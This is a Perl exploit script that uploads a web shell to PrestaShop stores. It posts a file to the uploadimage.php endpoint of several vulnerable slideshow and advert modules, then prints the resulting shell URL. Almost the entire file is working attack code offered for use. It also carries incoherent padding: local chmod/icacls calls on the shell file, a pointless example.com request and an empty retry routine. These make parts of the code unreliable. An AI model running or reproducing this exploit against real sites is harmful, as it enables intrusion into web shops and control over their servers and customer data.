modules/exploits/prestashop_shell_exploit.pl

#!/usr/bin/perl
use strict;
use warnings;
use FindBin '$Bin';
use Term::ANSIColor;
use URI::Escape;
use HTML::Entities;
use LWP::UserAgent;
use Config;
use JSON;
use IO::Async::Loop;
use Net::Async::HTTP;

print color 'reset';

# Detect OS
my $os = $Config{osname};
print "Detected OS: $os\n";

# Load configuration
my $config_file = 'config.json';
open my $fh, '<', $config_file or die "Could not open '$config_file' $!\n";
my $config = decode_json(do { local $/; <$fh> });
close $fh;

# Define user agent
my $ua = LWP::UserAgent->new;
$ua->timeout(10);

# Check arguments
if (@ARGV < 2) {
    print "Usage: perl $0 Target Shell\n";
    exit;
}

my $URL = $ARGV[0];
my $FILE = $ARGV[1];
my @error = ("Shell uploaded successfully", "Target Not vulnerable");
my @PARAMETER = ("/simpleslideshow/", "/productpageadverts/", "/homepageadvertise/", "/columnadverts/", "/vtemslideshow/");

for my $PARAMETER (@PARAMETER) {
    if ($URL =~ /$PARAMETER/) {
        $URL =~ s/$PARAMETER(.*)//s;
        my $add = $PARAMETER . "uploadimage.php";
        $URL = $URL . $add;

        print "SCAN: $URL\n";
        use HTTP::Request::Common;
        $ua = LWP::UserAgent->new;
        my $response = $ua->request(POST $URL, ['Content_Type' => 'form-data', 'userfile' => [$FILE]]);
        my $shellFILE = $FILE;

        if ($response->content =~ /success/) {
            print color 'green';
            print "$error[0] ";
            $shellFILE =~ s/$Bin//g;
            my $shell = "slides" . $shellFILE;
            $URL =~ s/uploadimage.php/$shell/g;
            print "$URL\n";
            print color 'reset';

            # Additional OS-specific commands
            if ($os eq 'linux') {
                # Linux-specific commands
                print "Executing Linux-specific commands...\n";
                system("chmod +x $shellFILE");
            } elsif ($os eq 'MSWin32') {
                # Windows-specific commands
                print "Executing Windows-specific commands...\n";
                system("icacls $shellFILE /grant Everyone:F");
            } elsif ($os eq 'darwin') {
                # macOS-specific commands
                print "Executing macOS-specific commands...\n";
                system("chmod +x $shellFILE");
            } else {
                print "OS-specific commands not defined for $os\n";
            }
        } else {
            print color 'red';
            print "$error[1]\n";
            print color 'reset';
        }
    }
}

# Asynchronous I/O operations
my $loop = IO::Async::Loop->new;
my $http = Net::Async::HTTP->new;
$loop->add($http);

# Example asynchronous request
$http->GET('http://example.com')->then(sub {
    my $response = shift;
    print "Received response: " . $response->content . "\n";
})->get;

# Logging and monitoring
sub log_message {
    my ($message) = @_;
    open my $log_fh, '>>', 'script.log' or die "Could not open log file $!\n";
    print $log_fh "$message\n";
    close $log_fh;
}

log_message("Script executed successfully");

# Retry mechanism
sub retry {
    my ($code, $retries) = @_;
    my $attempt = 0;
    while ($attempt < $retries) {
        eval { $code->(); 1 } and last;
        $attempt++;
        sleep 1;
    }
}

retry(sub {
    # Code to retry
}, 3);

# Documentation and usage instructions
__END__

=head1 NAME

prestashop_shell_exploit.pl - Prestashop Modules Shell Upload Exploit

=head1 SYNOPSIS

perl prestashop_shell_exploit.pl TARGET SHELL

=head1 DESCRIPTION

This script exploits vulnerable Prestashop modules to upload a shell.

=head1 CONFIGURATION

The script uses a configuration file (config.json) for settings.

=head1 AUTHOR

Alisam Technology Team

=head1 LICENSE

This script is licensed under the GPL.

=cut